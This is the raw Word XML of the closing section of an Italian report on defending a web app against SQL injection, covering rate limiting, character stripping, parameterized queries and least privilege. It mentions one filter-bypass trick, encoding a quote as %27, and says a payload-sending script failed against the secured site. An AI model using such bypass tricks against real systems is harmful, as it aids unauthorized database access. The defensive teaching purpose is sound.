          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A3386F" wp14:editId="238B8E91">
            <wp:extent cx="5444836" cy="1693473"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="64282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25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4356" cy="169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D003" w14:textId="5B571D59" w:rsidR="00E4119E" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc232068351"/>
      <w:bookmarkStart w:id="35" w:name="_Toc232079426"/>
      <w:r>
        <w:t xml:space="preserve">Ulteriori Difese </w:t>
      </w:r>
      <w:r w:rsidR="009D7B2A">
        <w:t xml:space="preserve">Analizzate ma </w:t>
      </w:r>
      <w:r>
        <w:t>Non Utilizzate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="7FC4F14E" w14:textId="7E65FB27" w:rsidR="00E4119E" w:rsidRDefault="00C05117" w:rsidP="00E4119E">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Abbiamo anche pensato ad altre possibili difese che però non sono state implementate poiché limitavano l’esperienza dell’utente o perché non utili al nostro progetto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D32E166" w14:textId="77777777" w:rsidR="00C06220" w:rsidRPr="00C06220" w:rsidRDefault="00A768A0" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc232079427"/>
      <w:r>
        <w:t>Limitare i tentativi di accesso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="219CBE95" w14:textId="77777777" w:rsidR="00C06220" w:rsidRDefault="00C06220" w:rsidP="005E0A32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>Limitando il numero di volte le quali un utente può provare l’accesso</w:t>
      </w:r>
      <w:r w:rsidR="00A768A0">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A768A0">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ad esempio impostando massimo 5 tentativi ogni ora</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">), facciamo in modo </w:t>
      </w:r>
      <w:r w:rsidR="00AF711C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">che un attaccante non possa tentare troppe volte insieme l’accesso al sito. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286F3C1" w14:textId="2AC6A460" w:rsidR="00E4119E" w:rsidRDefault="00AF711C" w:rsidP="00C06220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 xml:space="preserve">Però ha più senso contro attacchi di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> o se implementato tramite controllo degli IP, che ovviamente nel nostro progetto d’esempio non è applicabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F30052" w14:textId="7A004DBE" w:rsidR="00C06220" w:rsidRPr="00C06220" w:rsidRDefault="00C06220" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc232079428"/>
      <w:r>
        <w:t>Rimozione di caratteri speciali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="16237921" w14:textId="77777777" w:rsidR="008A7CED" w:rsidRDefault="00C06220" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06220">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rimuovendo caratteri </w:t>
      </w:r>
      <w:r w:rsidR="00AF711C" w:rsidRPr="00C06220">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">come </w:t>
      </w:r>
      <w:r w:rsidR="00AF711C" w:rsidRPr="00C06220">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00AF711C" w:rsidRPr="00C06220">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D7B2A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">dagli input degli utenti, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">eliminiamo la possibilità di effettuare </w:t>
      </w:r>
      <w:r w:rsidR="00241543">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>le query classiche che u</w:t>
      </w:r>
      <w:r w:rsidR="005E0A32">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>tilizzano</w:t>
      </w:r>
      <w:r w:rsidR="00241543">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> questi caratteri per eseguire l’SQL Injection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEE72A" w14:textId="1448BF8F" w:rsidR="00AF711C" w:rsidRDefault="00102C1C" w:rsidP="00C06220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>In questo modo però limitiamo la creazione delle password per gli utenti e gli attaccanti</w:t>
      </w:r>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> possono </w:t>
      </w:r>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">comunque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>bypassare questo filtro usando</w:t>
      </w:r>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> alternativi (es la codifica </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>esadecimale %27</w:t>
      </w:r>
      <w:r w:rsidR="008A7CED">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> al posto di ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="007848FF">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DEDC0" w14:textId="3B029EE2" w:rsidR="007848FF" w:rsidRDefault="007848FF" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Le query parametrizzate risolvono il problema alla radice rendendo superflua questa opzione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF328D" w14:textId="77777777" w:rsidR="007D184D" w:rsidRDefault="007D184D" w:rsidP="007D184D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015B5C19" w14:textId="274B3598" w:rsidR="007D184D" w:rsidRDefault="007D184D" w:rsidP="007D184D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc232079429"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tentativo di Invio dei Payloads</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="296809E7" w14:textId="3D49AAFA" w:rsidR="007D184D" w:rsidRDefault="00BA17DA" w:rsidP="007D184D">
      <w:p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Provando ad </w:t>
      </w:r>
      <w:r w:rsidR="007D184D">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizzare </w:t>
      </w:r>
      <w:r w:rsidR="00651950">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>lo script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per inviare automaticamente i payloads, vedremo che sul sito sicuro tutte le SQL Injection inviate non riusciranno a passare le difese implementate, ritornando errore ad ogni payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85B978" w14:textId="508E2C97" w:rsidR="00BA17DA" w:rsidRPr="007D184D" w:rsidRDefault="00BA17DA" w:rsidP="00BA17DA">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA17DA">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79516D2D" wp14:editId="158A833B">
            <wp:extent cx="5402390" cy="4516582"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="25418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88007" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="2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67" cy="452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BEA1B" w14:textId="77777777" w:rsidR="0082536D" w:rsidRDefault="0082536D" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102CFFD8" w14:textId="77777777" w:rsidR="006E02FD" w:rsidRDefault="006E02FD" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc232068352"/>
    </w:p>
    <w:p w14:paraId="4A88C531" w14:textId="7DD930AB" w:rsidR="0082536D" w:rsidRDefault="0082536D" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc232079430"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>CONCLUSIONI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="7C01CA21" w14:textId="77777777" w:rsidR="0082536D" w:rsidRPr="00483468" w:rsidRDefault="0082536D" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1847C28B" w14:textId="6D233CFA" w:rsidR="0082536D" w:rsidRDefault="00BF69CB" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>La maggior parte degli attacchi di tipo SQL Injection è causata principalmente da pratiche di programmazione insicure, che possono essere mitigate semplicemente applicando i principi chiave della programmazione difensiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA1D5ED" w14:textId="2D1CA4F4" w:rsidR="00BF69CB" w:rsidRDefault="00BF69CB" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Siccome questo tipo di attacchi sono vari, facili da eseguire e molto pericolosi, è necessario implementare molteplici contromisure tramite un approccio a più livelli, unendo la scrittura di codice sicuro (es l’uso delle query parametrizzate) a una configurazione rigorosa del DB (es applicando il principio del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>least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privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0247F" w14:textId="6342A5E6" w:rsidR="00106D47" w:rsidRPr="001B6919" w:rsidRDefault="00BF69CB">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>In definitiva, solo affiancando queste molteplici difese dall’inizio del ciclo di vita del software possiamo efficacemente proteggere le proprietà CIA dei nostri sistemi.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00106D47" w:rsidRPr="001B6919" w:rsidSect="006713B8">
      <w:headerReference w:type="default" r:id="rId26"/>
      <w:footerReference w:type="even" r:id="rId27"/>
      <w:footerReference w:type="default" r:id="rId28"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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8784C" w14:textId="77777777" w:rsidR="00A04D44" w:rsidRDefault="00A04D44">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="10A6EEEA" w14:textId="77777777" w:rsidR="00A04D44" w:rsidRDefault="00A0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E178F1-CF6F-4114-937B-9FDD1A916A8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F05B471F-5288-45B1-B21E-E71706101690}"/>
    <w:embedBold r:id="rId3" w:fontKey="{77DEBB1F-D5F8-4C7B-B4F5-A4D695A378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BDBEBC-3F33-4315-BA8C-0677701018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E6F3C6-CC81-4286-A722-2EDF2003D7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7B48" w14:textId="77777777" w:rsidR="00106D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93A3EC5" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D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4B9C" w14:textId="77777777" w:rsidR="00106D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83468">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="76D87BD5" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D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EF1D1" w14:textId="77777777" w:rsidR="00A04D44" w:rsidRDefault="00A04D44">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B74C9B6" w14:textId="77777777" w:rsidR="00A04D44" w:rsidRDefault="00A04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7595" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D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036"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84B0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61B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD38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23C1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="840E6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715E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8518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A4CAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9EE54F6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="566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133" w:hanging="359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E705DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC98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E3737"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67883A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2356C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="432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D7757"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43AA3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427069"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B5AA4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C171D44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDCC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DF1B73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D7A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D7791"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6964A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84444CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBA6D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E25179"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="998E540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F4A29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B008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0330A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21481006"/>
    <w:lvl w:ilvl="0" w:tplc="37587A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042EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D00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09782B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D25E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226D80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E38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60810"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CF6BB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C4714F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D45E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040FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="643E0A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6FB7023"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8600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C3985"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE2A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F34754"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="615C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F47E3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F014E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4609A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FCE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DD0577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22043E7E"/>
    <w:lvl w:ilvl="0" w:tplc="B6DA7304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97C9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0ECD296"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="69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7A1E16BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68E0CB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175A06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC7ABD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203465">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="181625697">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="270207793">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="16931573">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1677079260">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1585335036">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1861313300">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="614751135">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1552036373">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="653415477">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="656542136">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="150489207">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="507794395">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="750736096">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1307393261">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="71053193">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1209492257">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="978724561">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="624969011">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1187216533">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="638193139">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1243219853">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1727072426">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1443567995">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="2027754658">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1966306557">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1355497803">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="461778086">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1062218352">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="2122065378">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="195390368">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="6211108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47"/>
    <w:rsid w:val="0000563F"/>
    <w:rsid w:val="0000671D"/>
    <w:rsid w:val="00014EC5"/>
    <w:rsid w:val="00053147"/>
    <w:rsid w:val="000610A3"/>
    <w:rsid w:val="000A484B"/>
    <w:rsid w:val="00100582"/>
    <w:rsid w:val="00102C1C"/>
    <w:rsid w:val="00106D47"/>
    <w:rsid w:val="00124EDB"/>
    <w:rsid w:val="00127B95"/>
    <w:rsid w:val="00182A14"/>
    <w:rsid w:val="001A2937"/>
    <w:rsid w:val="001B6919"/>
    <w:rsid w:val="001C6E6E"/>
    <w:rsid w:val="001D0118"/>
    <w:rsid w:val="0021048F"/>
    <w:rsid w:val="00241543"/>
    <w:rsid w:val="00244A58"/>
    <w:rsid w:val="00270661"/>
    <w:rsid w:val="00294D9A"/>
    <w:rsid w:val="002953E6"/>
    <w:rsid w:val="0029686E"/>
    <w:rsid w:val="00320C19"/>
    <w:rsid w:val="003346B6"/>
    <w:rsid w:val="00342751"/>
    <w:rsid w:val="003524A7"/>
    <w:rsid w:val="00383BC5"/>
    <w:rsid w:val="00396AA7"/>
    <w:rsid w:val="003C72CA"/>
    <w:rsid w:val="003E5198"/>
    <w:rsid w:val="004038D7"/>
    <w:rsid w:val="00406A2B"/>
    <w:rsid w:val="00414EF6"/>
    <w:rsid w:val="00421669"/>
    <w:rsid w:val="00451A64"/>
    <w:rsid w:val="00483468"/>
    <w:rsid w:val="0049382B"/>
    <w:rsid w:val="00493B0B"/>
    <w:rsid w:val="004D0DD8"/>
    <w:rsid w:val="004D35F7"/>
    <w:rsid w:val="00512F70"/>
    <w:rsid w:val="00563379"/>
    <w:rsid w:val="005E0A32"/>
    <w:rsid w:val="0062473F"/>
    <w:rsid w:val="00651950"/>
    <w:rsid w:val="00657642"/>
    <w:rsid w:val="00660E40"/>
    <w:rsid w:val="006713B8"/>
    <w:rsid w:val="006D5A48"/>
    <w:rsid w:val="006D7692"/>
    <w:rsid w:val="006E02FD"/>
    <w:rsid w:val="00715AE6"/>
    <w:rsid w:val="00756352"/>
    <w:rsid w:val="00760E5D"/>
    <w:rsid w:val="007848FF"/>
    <w:rsid w:val="0079352B"/>
    <w:rsid w:val="007A69C1"/>
    <w:rsid w:val="007C3613"/>
    <w:rsid w:val="007C7973"/>
    <w:rsid w:val="007D184D"/>
    <w:rsid w:val="00824C58"/>
    <w:rsid w:val="0082536D"/>
    <w:rsid w:val="00883B58"/>
    <w:rsid w:val="00886DC6"/>
    <w:rsid w:val="0089124C"/>
    <w:rsid w:val="008A7CED"/>
    <w:rsid w:val="008E6098"/>
    <w:rsid w:val="009227BE"/>
    <w:rsid w:val="00923FE4"/>
    <w:rsid w:val="0092508A"/>
    <w:rsid w:val="009C23DD"/>
    <w:rsid w:val="009D0C24"/>
    <w:rsid w:val="009D7B2A"/>
    <w:rsid w:val="009F7FF7"/>
    <w:rsid w:val="00A04D44"/>
    <w:rsid w:val="00A439D9"/>
    <w:rsid w:val="00A608E6"/>
    <w:rsid w:val="00A768A0"/>
    <w:rsid w:val="00AC4292"/>
    <w:rsid w:val="00AD15F2"/>
    <w:rsid w:val="00AD239B"/>
    <w:rsid w:val="00AF711C"/>
    <w:rsid w:val="00B61AEC"/>
    <w:rsid w:val="00B97A4B"/>
    <w:rsid w:val="00BA17DA"/>
    <w:rsid w:val="00BA3A3C"/>
    <w:rsid w:val="00BC44B5"/>
    <w:rsid w:val="00BE02D5"/>
    <w:rsid w:val="00BF69CB"/>
    <w:rsid w:val="00C01BAF"/>
    <w:rsid w:val="00C05117"/>
    <w:rsid w:val="00C06220"/>
    <w:rsid w:val="00C300A4"/>
    <w:rsid w:val="00CD4263"/>
    <w:rsid w:val="00CF6081"/>
    <w:rsid w:val="00D333FF"/>
    <w:rsid w:val="00D555E5"/>
    <w:rsid w:val="00D56311"/>
    <w:rsid w:val="00D71BCB"/>
    <w:rsid w:val="00D97E08"/>
    <w:rsid w:val="00DC6292"/>
    <w:rsid w:val="00DF3023"/>
    <w:rsid w:val="00E4119E"/>
    <w:rsid w:val="00E6145E"/>
    <w:rsid w:val="00E6717B"/>
    <w:rsid w:val="00E748EA"/>
    <w:rsid w:val="00E86B87"/>
    <w:rsid w:val="00E92576"/>
    <w:rsid w:val="00E95C81"/>
    <w:rsid w:val="00EE27E5"/>
    <w:rsid w:val="00F601CD"/>
    <w:rsid w:val="00F67657"/>
    <w:rsid w:val="00F761C8"/>
    <w:rsid w:val="00F801B0"/>
    <w:rsid w:val="00F8039B"/>
    <w:rsid w:val="00FB1895"/>
    <w:rsid w:val="00FD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B5FA"/>
  <w15:docId w15:val="{BC897391-1458-4CE2-9F62-FB42633B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F6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:line="216" w:lineRule="auto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Heading4"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D555E5"/>
    <w:pPr>
